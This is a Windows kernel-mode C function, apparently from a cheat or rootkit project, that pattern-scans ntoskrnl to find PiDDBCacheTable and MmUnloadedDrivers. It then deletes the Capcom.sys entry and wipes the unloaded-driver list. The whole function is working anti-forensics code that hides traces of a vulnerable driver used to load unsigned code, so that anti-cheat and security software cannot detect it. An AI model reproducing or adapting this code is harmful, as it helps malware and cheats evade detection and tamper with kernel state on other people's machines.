BOOLEAN CleanUnloadedDrivers(){ ULONG bytes = 0; NTSTATUS status = ZwQuery

1. BOOLEAN CleanUnloadedDrivers()
2. {
3. ULONG bytes = 0;
4. NTSTATUS status = ZwQuerySystemInformation(11, 0, bytes, &bytes);
5.  
6. if (!bytes)
7. {
8. DbgPrint("CleanUnloadedDrivers: first NtQuerySystemInformation failed, status: 0x%x", status);
9. return FALSE;
10. }
11.  
12. PRTL_PROCESS_MODULES modules = (PRTL_PROCESS_MODULES)ExAllocatePoolWithTag(NonPagedPool, bytes, 0x454E4F45); // 'ENON'
13.  
14. status = ZwQuerySystemInformation(11, modules, bytes, &bytes);
15.  
16. if (!NT_SUCCESS(status))
17. {
18. DbgPrint("CleanUnloadedDrivers: second NtQuerySystemInformation failed, status: 0x%x", status);
19. return FALSE;
20. }
21.  
22. PRTL_PROCESS_MODULE_INFORMATION module = modules->Modules;
23. UINT64 ntoskrnlBase = 0, ntoskrnlSize = 0;
24.  
25. for (ULONG i = 0; i < modules->NumberOfModules; i++)
26. {
27. DbgPrint("CleanUnloadedDrivers: path: %s", module[i].FullPathName);
28.  
29. if (!strcmp((char*)module[i].FullPathName, "\\SystemRoot\\system32\\ntoskrnl.exe"))
30. {
31. ntoskrnlBase = (UINT64)module[i].ImageBase;
32. ntoskrnlSize = (UINT64)module[i].ImageSize;
33. break;
34. }
35. }
36.  
37. if (modules)
38. ExFreePoolWithTag(modules, 0);
39.  
40. if (ntoskrnlBase <= 0)
41. {
42. DbgPrint("CleanUnloadedDrivers: ntoskrnlBase equals zero");
43. return FALSE;
44. }
45. PVOID PiDDBLockPtr = (PVOID)FindPattern((UINT64)ntoskrnlBase, (UINT64)ntoskrnlSize, (UCHAR*)"\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x4C\x8B\x8C", "xxx????x????xxx");
46. PVOID PiDDBCacheTablePtr = (PVOID)FindPattern((UINT64)ntoskrnlBase, (UINT64)ntoskrnlSize, (UCHAR*)"\x66\x03\xD2\x48\x8D\x0D", "xxxxxx");
47. // NOTE: 4C 8B ? ? ? ? ? 4C 8B C9 4D 85 ? 74 + 3] + current signature address = MmUnloadedDrivers
48. UINT64 mmUnloadedDriversPtr = FindPattern((UINT64)ntoskrnlBase, (UINT64)ntoskrnlSize, (BYTE*)"\x4C\x8B\x00\x00\x00\x00\x00\x4C\x8B\xC9\x4D\x85\x00\x74", "xx?????xxxxx?x");
49.  
50. if (!mmUnloadedDriversPtr)
51. {
52. DbgPrint("CleanUnloadedDrivers: mmUnloadedDriversPtr equals zero");
53. return FALSE;
54. }
55.  
56. PERESOURCE PiDDBLock = (PERESOURCE)ResolveRelativeAddress(PiDDBLockPtr, 3, 7);
57. PRTL_AVL_TABLE PiDDBCacheTable = (PRTL_AVL_TABLE)ResolveRelativeAddress(PiDDBCacheTablePtr, 6, 10);
58.  
59.  
60. PiDDBCacheTable->TableContext = (PVOID)1;
61.  
62. UNICODE_STRING cpp;
63. RtlInitUnicodeString(&cpp, L"Capcom.sys");
64. PiDDBCacheEntry LookupEntry = { 0 };
65. LookupEntry.DriverName = cpp;
66.  
67.  
68.  
69. ExAcquireResourceExclusiveLite(PiDDBLock, TRUE);
70.  
71.  
72. PiDDBCacheEntry* pFoundEntry = (PiDDBCacheEntry*)RtlLookupElementGenericTableAvl(PiDDBCacheTable, &LookupEntry);
73. if (pFoundEntry == NULL)
74. {
75. ExReleaseResourceLite(PiDDBLock);
76. DbgPrint("NO Found Entry");
77. return 1;
78. }
79. DbgPrint("Found Entry");
80.  
81.  
82.  
83. if (RemoveEntryList(&pFoundEntry->List))
84. DbgPrint("Removed Entry");
85.  
86.  
87. // then delete the element from the avl table
88. if (RtlDeleteElementGenericTableAvl(PiDDBCacheTable, pFoundEntry))
89. DbgPrint("Removed Table");
90.  
91. // release the ddb resource lock
92. ExReleaseResourceLite(PiDDBLock);
93.  
94.  
95.  
96. UINT64 mmUnloadedDrivers = (UINT64)((PUCHAR)mmUnloadedDriversPtr + *(PULONG)((PUCHAR)mmUnloadedDriversPtr + 3) + 7);
97. UINT64 bufferPtr = *(UINT64*)mmUnloadedDrivers;
98.  
99. // NOTE: 0x7D0 is the size of the MmUnloadedDrivers array for win 7 and above
100. PVOID newBuffer = ExAllocatePoolWithTag(NonPagedPoolNx, 0x7D0, 0x54446D4D);
101.  
102. if (!newBuffer)
103. return FALSE;
104.  
105. memset(newBuffer, 0, 0x7D0);
106.  
107.  
108. *(UINT64*)mmUnloadedDrivers = (UINT64)newBuffer;
109.  
110.  
111. ExFreePoolWithTag((PVOID)bufferPtr, 0x54446D4D); // 'MmDT'
112. DbgPrint("All Cleaning Done");
113. return TRUE;
114. }